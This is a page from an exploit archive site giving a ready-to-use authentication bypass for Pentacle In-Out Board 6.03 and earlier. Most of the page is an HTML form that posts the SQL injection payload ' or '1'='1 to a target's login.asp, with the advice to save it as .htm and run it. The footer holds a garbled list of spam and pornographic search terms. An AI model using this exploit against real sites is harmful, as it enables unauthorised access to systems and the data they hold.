about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Pentacle In-Out Board <= 6.03 (login.asp) Remote Auth Bypass



2006-02-25 Pentacle In-Out Board <= 6.03 (login.asp) Remote Auth Bypass
Rated as : Critical

<html>
<title>Pentacle In-Out Board <= 6.03 (login.asp) Authencation
ByPass Vulnerability</title>
<script language=javascript>
function ptxpl(){
if(document.xpl.victim.value=="") {
  alert("Please enter site!");
  return false;
  }
if(confirm("Are you sure?")) {
 
	xpl.action="http://"+document.xpl.victim.value+"/login.asp";
                xpl.username.value=document.xpl.username.value;
  	xpl.userpassword.value=document.xpl.userpassword.value;
                xpl.submit();
   }
}
</script>
<strong>
<font face="Tahoma" size="2">
Fill in the blank !:D<br>
Just enter host/path/ not http://host/path/!<br>
If Pentacle installed on / just enter host<br>
Example: host.com<br>
Example2: host.com/ptdir/<br>
<form name="xpl" method="POST"
action="http://pentacle.g2soft.net/login.asp"
onsubmit=ptxpl();>
Target -> <input type="text" name="victim"
value="pentacle.g2soft.net" size="50">
<input type="hidden" name="username"
value="any">
<input type="hidden" name="userpassword"
value="' or '1'='1">
<input type="submit" value="Send">
</table></form>
</html>

Save this code as .htm and then execute.
securitydot.net - 2006-02-25

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 11:13:07 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
SashaKnox Www.102030 Allegro includes/d /claroline news for c saniabf WWW.PINKWO 3GP KHUSUS sign in fo www.98.com sexy.v kaixin.qqb sexy.v find aah exploi Www.Worlds www.freese video porn www.w3008. www.sh1988 grand ther OpenSSH 3. hose schoo girl news for C www.xboshi mediagalle Sexphoto g news for c www.malay 200+%252Fc 200 /compo 200+%252Fc ibf.com.ru mediagalle ww.sexcom vulva 200+%252Fc mediagalle gpf_demo www.u18871 Amerikanse Shakeel.se &Eacut 200+%252Fc mediagalle greg M1000 w w w .s e